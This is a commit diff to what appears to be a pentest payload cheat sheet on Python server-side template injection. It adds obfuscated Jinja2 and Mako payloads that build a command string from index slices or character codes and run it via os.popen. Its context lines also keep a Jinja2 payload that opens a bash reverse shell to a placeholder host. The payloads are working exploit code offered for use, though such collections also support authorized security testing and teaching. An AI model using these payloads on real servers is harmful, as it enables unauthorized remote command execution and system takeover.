Added Jinja and Mako obf payloads

Server Side Template Injection/Python.md

@@ -26,12 +26,14 @@
         - [Exploit The SSTI By Calling subprocess.Popen](#exploit-the-ssti-by-calling-subprocesspopen)
         - [Exploit The SSTI By Calling Popen Without Guessing The Offset](#exploit-the-ssti-by-calling-popen-without-guessing-the-offset)
         - [Exploit The SSTI By Writing an Evil Config File](#exploit-the-ssti-by-writing-an-evil-config-file)
+    - [Jinja2 - Remote Command Execution with Obfuscation](#jinja2---remote-command-execution-with-obfuscation)
     - [Jinja2 - Filter Bypass](#jinja2---filter-bypass)
 - [Tornado](#tornado)
     - [Tornado - Basic Injection](#tornado---basic-injection)
     - [Tornado - Remote Command Execution](#tornado---remote-command-execution)
 - [Mako](#mako)
     - [Mako - Remote Command Execution](#mako---remote-command-execution)
+    - [Mako - Remote Command Execution with Obfuscation](#mako---remote-command-execution-with-obfuscation)
 - [References](#references)
 
 ## Templating Libraries
@@ -260,6 +262,17 @@ Simple modification of the payload to clean up output and facilitate command inp
 {{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
 ```
 
+### Jinja2 - Remote Command Execution with Obfuscation
+
+Write the string: `id` using the index position of a known existing string (the index value may vary depending on the target): `{{self.__init__.__globals__.__str__()[1786:1788]}}`.
+
+Execute the system command `id`:
+```python
+{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}}
+```
+
+Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation).
+
 ### Jinja2 - Filter Bypass
 
 ```python
@@ -400,6 +413,21 @@ PoC :
 <module 'os' from '/usr/local/lib/python3.10/os.py'>
 ```
 
+### Mako - Remote Command Execution with Obfuscation
+
+In Mako, the following payload can be used to generates the string "id": `${str().join(chr(i)for(i)in[105,100])}`.
+
+Execute the system command `id`:
+```python
+${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()}
+```
+
+```python
+<%import os%>${os.popen(str().join(chr(i)for(i)in[105,100])).read()}
+```
+
+Reference and explanation of payload can be found [here](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation).
+
 ## References
 
 - [Cheatsheet - Flask & Jinja2 SSTI - phosphore - September 3, 2018](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti)
@@ -407,3 +435,4 @@ PoC :
 - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/)
 - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/)
 - [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits)
+- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack, Brumens - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation)